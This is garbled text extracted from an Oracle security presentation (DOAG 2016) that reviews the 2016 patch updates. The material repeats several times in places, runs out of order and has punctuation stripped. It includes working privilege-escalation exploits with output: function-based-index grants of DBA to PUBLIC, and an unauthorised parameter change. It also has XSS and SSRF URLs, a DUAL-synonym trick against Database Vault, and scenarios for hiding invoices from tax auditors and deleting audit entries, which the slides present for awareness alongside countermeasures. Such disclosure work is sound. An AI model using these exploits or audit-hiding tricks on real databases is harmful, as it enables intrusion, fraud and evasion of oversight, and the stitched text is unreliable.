==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
----- dbms_macadm -----
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN RETURN 'N'; END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
  RETURN 'Y';
END;

SQL> create or replace view mydual as select 'X' as dummy from dual where user='DVSYS';
SQL> grant select on sys.mydual to public;
SQL> drop public synonym dual;
SQL> create public synonym dual for sys.mydual;
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank ("The Catastrophe in the Database", Gunther Pipperr)
… where x=y
WHERE conditions can be changed using VPD.
VPD: add the where clause invoice_name != 'SAUNA_CLUB CHANTAL'
Hide "certain" invoices from the audit department.
Select value from table/view where x=y
The SQL Translation Framework (12c only) allows replacing an entire query: the user submits Query A, and the SQL Translation Framework replaces Query A with Query B.
Possible Countermeasures for paranoid Auditors
Add a random string, e.g. aksdjhiuz, to each query so that its text no longer matches a registered SQL Translation Framework translation (new SQL_ID).
Try to get EXEMPT ACCESS POLICY to disable VPD (even if not used in the application).
Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL).
Always check the object type (is it really a table?).
Use checksums for certain database objects (especially views).
Check the current schema to avoid attacks (e.g. alter session set current_schema=otheruser).
Modifying Queries on the fly
Powerful features for applications
(Huge) potential on critical systems to modify application logic (e.g. DB Vault)
DBAs and Auditors/Security Department should be aware of powerful Oracle features which could be used to modify application logic.
Audit these features even if not in use.
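As an added example (not part of the DOAG slides or of Red-Database-Security's own tooling), an auditor's read-only SQL*Plus script that checks for the features listed above: DUAL redirection, public synonym redirects, Data Redaction, VPD, SQL Translation Framework, current schema, and view checksums. It assumes a user with SELECT_CATALOG_ROLE and EXECUTE on DBMS_CRYPTO on a 12c database; the list of views hashed in step 7 is chosen for illustration.

```sql
-- Added example, not from the original DOAG 2016 slides: an auditor's
-- read-only check for the query-manipulation features described above.
-- Assumptions: run in SQL*Plus as a user with SELECT_CATALOG_ROLE and
-- EXECUTE on DBMS_CRYPTO; the view list in step 7 is chosen for illustration.
SET LINESIZE 200
SET PAGESIZE 100
SET SERVEROUTPUT ON

-- 1. Does DUAL still resolve to the SYS.DUAL table? A redirected PUBLIC
--    synonym (first query) or another object named DUAL (second query)
--    is the trick shown for the dbms_macadm check.
SELECT s.synonym_name, s.table_owner, s.table_name, o.object_type
  FROM dba_synonyms s
  JOIN dba_objects  o ON o.owner = s.table_owner AND o.object_name = s.table_name
 WHERE s.owner = 'PUBLIC' AND s.synonym_name = 'DUAL'
   AND NOT (s.table_owner = 'SYS' AND o.object_type = 'TABLE');
SELECT owner, object_name, object_type
  FROM dba_objects
 WHERE object_name = 'DUAL'
   AND owner <> 'SYS'
   AND NOT (owner = 'PUBLIC' AND object_type = 'SYNONYM');
-- expected: no rows from either statement

-- 2. PUBLIC synonyms that reuse the name of a SYS object but point elsewhere
--    (the "redirect" approach from the slides).
SELECT s.synonym_name, s.table_owner, s.table_name
  FROM dba_synonyms s
 WHERE s.owner = 'PUBLIC'
   AND s.table_owner NOT IN ('SYS', 'SYSTEM')
   AND EXISTS (SELECT 1 FROM dba_objects o
                WHERE o.owner = 'SYS' AND o.object_name = s.synonym_name);

-- 3. Data Redaction policies (the "Select value" manipulation): every policy
--    must be explainable by the application owner.
SELECT object_owner, object_name, policy_name, expression, enable
  FROM redaction_policies
 ORDER BY object_owner, object_name;

-- 4. VPD policies (the hidden WHERE clause) and the function they call.
SELECT object_owner, object_name, policy_name, pf_owner, package, function, enable
  FROM dba_policies
 ORDER BY object_owner, object_name;

-- 5. SQL Translation Framework (12c): registered profiles, their
--    translations, and whether this session has a profile switched on.
SELECT owner, profile_name FROM dba_sql_translation_profiles;
SELECT owner, profile_name, enabled, sql_text, translated_text
  FROM dba_sql_translations;
SELECT value FROM v$parameter WHERE name = 'sql_translation_profile';
-- expected for an audit session: no profiles, NULL parameter value

-- 6. Are we really in our own schema? SYS.DUAL is fully qualified on purpose
--    so this query does not depend on the DUAL synonym checked in step 1.
SELECT sys_context('USERENV', 'SESSION_USER')   AS sess_user,
       sys_context('USERENV', 'CURRENT_SCHEMA') AS cur_schema
  FROM sys.dual;
-- expected: both values identical

-- 7. Checksums for security-relevant views: record the SHA-256 of the
--    current DDL and compare it with the value from the previous audit.
DECLARE
  l_ddl  CLOB;
  l_hash RAW(32);
BEGIN
  FOR v IN (SELECT owner, view_name
              FROM dba_views
             WHERE owner = 'SYS'
               AND view_name IN ('DBA_AUDIT_TRAIL', 'DBA_USERS',
                                 'DBA_ROLE_PRIVS', 'DBA_SYS_PRIVS'))
  LOOP
    l_ddl  := dbms_metadata.get_ddl('VIEW', v.view_name, v.owner);
    l_hash := dbms_crypto.hash(l_ddl, dbms_crypto.hash_sh256);
    dbms_output.put_line(rpad(v.owner || '.' || v.view_name, 30)
                         || rawtohex(l_hash));
  END LOOP;
END;
/
```

Any row returned by steps 1 to 5, a mismatch in step 6, or a changed hash in step 7 points to exactly the kind of modification the slides describe and should be explained before the scan results are trusted.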
Trends 2017
New hardening documents for Oracle 12.2 required (new features, new packages, …)
Migration to 12.2
More auditing projects
Integration of Auditing with SIEM solutions
Q & A
Thank you
Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
February 2016
Nothing special happened
March 2016
Nothing special happened
April 2016
Oracle CPU April 2016
http://www.oracle.com/technetwork/topics/security/cpuapr2015-2365600.html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 9.0)
1 OLAP (CVSS 7.8)
3 RDBMS Security (CVSS 5.9, 3.3, 3.3; 1 remote)
http://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html
Apr 2016 CPU - CVE-2016-0690
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: AUDIT NOT EXISTS fails to capture attempts to execute a procedure that does not exist, either because the user does not have the execute privilege on it or because the procedure does not exist. If a DBA wants to capture attempts to execute procedures where the user does not have the execute privilege, we must also add:
Reporter: David Litchfield
Exploit:
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL;
Apr 2016 CPU - CVE-2016-0691
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: If a missing function (missing due to no execute privilege) is used within a SELECT query, the name of the function is not logged, only the name of the table in the query.
Reporter: David Litchfield
Exploit: obvious, Create Java Source…
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 9.0)
1 JDBC (CVSS 8.1, remote)
1 Portable Clusterware (CVSS 7.5, remote)
1 Data Pump (CVSS 6.7)
2 APEX (CVSS 6.1, 5.8; 2 remote)
1 RDBMS Security (CVSS 5.3, remote)
1 DB Sharding (CVSS 4.4)
1 Database Vault (CVSS 3.4)
http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html
Jul 2016 CPU - CVE-2016-3448
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: The HTMLDB_UTIL PL/SQL package is vulnerable to an XSS flaw. To access it, the schema (APEX_050000) needs to be specified first, however, because the config file whitelists apex.
Reporter: David Litchfield
Exploit:
http://example.com/ords/apex_050000.htmldb_util.JSON_FROM_ARRAY?P_COLS=1&P_NAME01=XX%22%3E%3CH1%3EOops%3C/H1%3E&P_F01=Y&P_ROWS=1
Jul 2016 CPU - CVE-2016-3467
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: APEX 5 is vulnerable to a server-side request forgery flaw, i.e. it can be made to connect to another web server and port regardless of whether allowed URLs have been configured. For example, the request below will connect to someotherserver on port and POST X as a payload. This can be used as a port scanning mechanism, used to attack systems protected by a firewall, etc.
Reporter: David Litchfield
Exploit:
http://example/ords/apex_050000.WWV_FLOW_WEBSERVICES_API.MAKE_REQUEST?P_URL=http://someotherserver:port&p_envelope=X
Apr 2016 CPU - CVE-2016-3488
Problem: Package dbms_gsm_common allows changing a database parameter without the admin privileges and without a restart.
Reporter: Bruno Cirone
Exploit:
exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY','TRUE')
Jul 2016 CPU - CVE-2016-3488
-- as SYS
SQL> select name, value from v$parameter where name='O7_DICTIONARY_ACCESSIBILITY';
O7_DICTIONARY_ACCESSIBILITY FALSE
-- as user GSMUSER
SQL> exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY','TRUE')
PL/SQL-Prozedur erfolgreich abgeschlossen.
-- as user SYS - re-run again after execution of the package
SQL> select name, value from v$parameter where name='O7_DICTIONARY_ACCESSIBILITY';
O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU - CVE-2016-3484
Problem: SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter: Alexander Kornbrust
Problem (Details + Exploit later…)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN RETURN 'N'; END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN RETURN 'N'; END IF;
  RETURN 'Y';
END;
July 2016 CPU - CVE-2016-3489
Problem: Privilege escalation via INDEX privilege and function based index (FBI)
Reporter: Alexander Kornbrust
July 2016 CPU - CVE-2016-3489
-- Oracle 11.2.0.4
SYSTEM@SQL> select grantee, owner, table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = 'INDEX' AND GRANTEE != OWNER and owner='SYS';
GRANTEE    OWNER    TABLE_NAME
---------- -------- ----------
SYSTEM     SYS      INCEXP
SYSTEM     SYS      INCFIL
SYSTEM     SYS      INCVID
SYSTEM@SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant select on sys.link$ to public';
  COMMIT;
  RETURN FOO;
END;
/
SQL> grant execute on getdba to public;
July 2016 CPU - CVE-2016-3489
==> SYSTEM does not have access to the SYS.LINK$ table
SQL> select count(*) from sys.link$;
ERROR at line 1:
ORA-01031: insufficient privileges
==> also the execution of getdba throws an error
SQL> select getdba('i') from dual;
ERROR at line 1:
ORA-01031: insufficient privileges
ORA-06512: at "SYSTEM.GETDBA", line 4
==> Now create an index on the table sys.incvid using a function based index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('AK'));
Index created.
SQL> select count(*) from sys.link$;
  COUNT(*)
----------
        11
July 2016 CPU - CVE-2016-3489
-- Oracle 12.1.0.2 (SYSTEM no longer has INHERIT ANY PRIVILEGE)
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA(1));
CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA(1))
FEHLER in Zeile 1:
ORA-06598: Nicht ausreichende INHERIT PRIVILEGES-Berechtigung
ORA-06512: in "SYSTEM.GETDBA", Zeile 1
-- On 12.1.0.2 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use
-- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsys.GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant select on sys.link$ to public';
  COMMIT;
  RETURN FOO;
END;
/
SQL> grant execute on wmsys.getdba to public;
-- now we create the index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(WMSYS.GETDBA('AK'));
August 2016
Hackproofing Oracle's eBusiness Suite by David Litchfield
Presentation + Supporting documents
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5.pdf
September 2016
Nothing special happened
October 2016
Oracle CPU October 2016
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 9.1)
2 Kernel PDB (CVSS 6.4, 6.0)
3 RDBMS Security (CVSS 6.4, 3.3, 3.3)
1 APEX (CVSS 6.1, remote)
1 RDBMS Security & SQL*Plus (CVSS 2.4)
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
Oct 2016 CPU - CVE-2016-5497
Problem: UNSALTED MD5 HASH STILL PRESENT IN 12C DATABASE - DIGEST VERIFIER
Shown as an open problem at the DOAG 2015 presentation
Reporter: Alexander Kornbrust
Oracle Password Hash 12.1.0.2+
Oracle 12.1.0.2 introduced a new PBKDF2 SHA-512 based algorithm.
The new T: password hash is 10 times slower than the old DES hash (Oracle 7+) and 88 times slower than the SHA-1 based hash (Oracle 11+).
The new algorithm is known and already implemented in some tools.
Remark: Microsoft Office 2013 is 10 times more time consuming to crack than the new Oracle PBKDF2.
Oracle Password Hash 12.1.0.2+
Let's have a look at RFC 2617:
KD(secret, data) = H(concat(secret, ":", data))
No salt, but a secret
Secret = 'XDB'
and the hash will be MD5('XDB:tiger')
and stored in the spare4 column starting with the H: hash
Oct 2016 CPU - CVE-2016-5516
Problem: In Oracle 12c the DBMS_PDB_EXEC_SQL procedure is a wrapper for the DBMS_PDB.EXEC_AS_ORACLE_SCRIPT procedure, which executes SQL as the SYS user. The XDB user has the execute privilege on DBMS_PDB_EXEC_SQL and, as such, by first exploiting a vulnerability in a publicly executable XDB-owned PL/SQL object, an attacker can leverage this privilege to execute SQL as SYS. The fix changes both DBMS_PDB_EXEC_SQL and DBMS_PDB from using the DEFINER rights to the INVOKER rights execution model.
Reporter: David Litchfield
Oct 2016 CPU - CVE-2016-5604
Problem: Privilege Escalation in Oracle Cloud Control (12.1.3)
Reporter: Alexander Kornbrust
sqlplus sysman_apmrdsora1
SQL> desc dba_users
ERROR:
ORA-04043: object SYS.DBA_USERS does not exist
==> user does not have the privilege to access DBA_USERS
SQL> select * from user_sys_privs;
USERNAME                       PRIVILEGE                                ADM
------------------------------ ---------------------------------------- ---
SYSMAN_APM                     UNLIMITED TABLESPACE                     NO
SYSMAN_APM                     CREATE VIEW                              NO
SYSMAN_APM                     CREATE ANY LIBRARY                       NO
SYSMAN_APM                     CREATE SEQUENCE                          NO
SYSMAN_APM                     CREATE TABLE                             NO
SYSMAN_APM                     CREATE LIBRARY                           NO
SYSMAN_APM                     CREATE ANY INDEX                         NO
==> the CREATE ANY LIBRARY privilege is granted to SYSMAN_APM
SQL> select * from user_role_privs;
USERNAME                       GRANTED_ROLE                   ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
SYSMAN_APM                     CONNECT                        NO  YES NO
SYSMAN_APM                     RESOURCE                       NO  YES NO
==> Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant dba to public';
  COMMIT;
  RETURN FOO;
END;
/
==> Grant execution privileges to PUBLIC
SQL> grant execute on getdba to public;
==> Create an index on SYSTEM.HELP using a function based index (FBI). The function getdba is used for the function based index.
SQL> CREATE INDEX EXPLOIT_INDEX ON SYSTEM.HELP(SYSMAN_APM.GETDBA('AK2'));
==> Reconnect is necessary
SQL> select * from dba_role_privs where granted_role='DBA' and grantee='PUBLIC';
GRANTEE                        GRANTED_ROLE                   ADM DEF
------------------------------ ------------------------------ --- ---
PUBLIC                         DBA                            NO  YES
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU - CVE-2016-3467
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: APEX 5 is vulnerable to a server-side request forgery flaw, i.e. it can be made to connect to another web server and port regardless of whether allowed URLs have been configured. For example, the request below will connect to someotherserver on the given port and POST "X" as a payload. This can be used as a port scanning mechanism, to attack systems protected by a firewall, etc.
Reporter: David Litchfield
Exploit:
http://example/ords/apex_050000.WWV_FLOW_WEBSERVICES_API.MAKE_REQUEST?P_URL=http://someotherserver:port&p_envelope=X
Jul 2016 CPU - CVE-2016-3488
Problem: Package dbms_gsm_common allows changing a database parameter without the admin privileges and without a restart.
Reporter: Bruno Cirone
Exploit:
exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY','TRUE')

Jul 2016 CPU - CVE-2016-3488
-- as SYS
SQL> select name, value from v$parameter where name='O7_DICTIONARY_ACCESSIBILITY';
O7_DICTIONARY_ACCESSIBILITY FALSE

-- as user GSMUSER
SQL> exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY','TRUE')
PL/SQL-Prozedur erfolgreich abgeschlossen.

-- as user SYS - re-run after execution of the package
SQL> select name, value from v$parameter where name='O7_DICTIONARY_ACCESSIBILITY';
O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU - CVE-2016-3484
Problem: SYS CAN INFLUENCE DVSYS ANALYSIS
Reporter: Alexander Kornbrust
Problem (details + exploit later...):

FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) = 4000 THEN
    RETURN 'N';
  END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN
    RETURN 'N';
  END IF;
  RETURN 'Y';
END;
July 2016 CPU - CVE-2016-3489
Problem: Privilege escalation via INDEX privilege and function based index (FBI)
Reporter: Alexander Kornbrust

-- Oracle 11.2.0.4
SYSTEM@SQL> select grantee, owner, table_name from dba_tab_privs where privilege = 'INDEX' and grantee != owner and owner = 'SYS';
GRANTEE   OWNER   TABLE_NAME
--------- ------- ----------
SYSTEM    SYS     INCEXP
SYSTEM    SYS     INCFIL
SYSTEM    SYS     INCVID

SYSTEM@SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  2    PRAGMA AUTONOMOUS_TRANSACTION;
  3  BEGIN
  4    execute immediate 'grant select on sys.link$ to public';
  5    COMMIT;
  6    RETURN FOO;
  7  END;
  8  /
SQL> grant execute on getdba to public;

==> SYSTEM does not have access to the SYS.LINK$ table
SQL> select count(*) from sys.link$;
ERROR at line 1:
ORA-01031: insufficient privileges

==> Also the execution of getdba throws an error
SQL> select getdba('i') from dual;
ERROR at line 1:
ORA-01031: insufficient privileges
ORA-06512: at "SYSTEM.GETDBA", line 4

==> Now create an index on the table sys.incvid using a function based index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('AK'));
Index created.

SQL> select count(*) from sys.link$;
  COUNT(*)
----------
        11

-- Oracle 12.1.0.2 (SYSTEM no longer has INHERIT ANY PRIVILEGE)
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('1'));
CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('1'))
FEHLER in Zeile 1:
ORA-06598: Nicht ausreichende INHERIT PRIVILEGES-Berechtigung
ORA-06512: in "SYSTEM.GETDBA", Zeile 1

-- On 12.1.0.2 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use
-- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
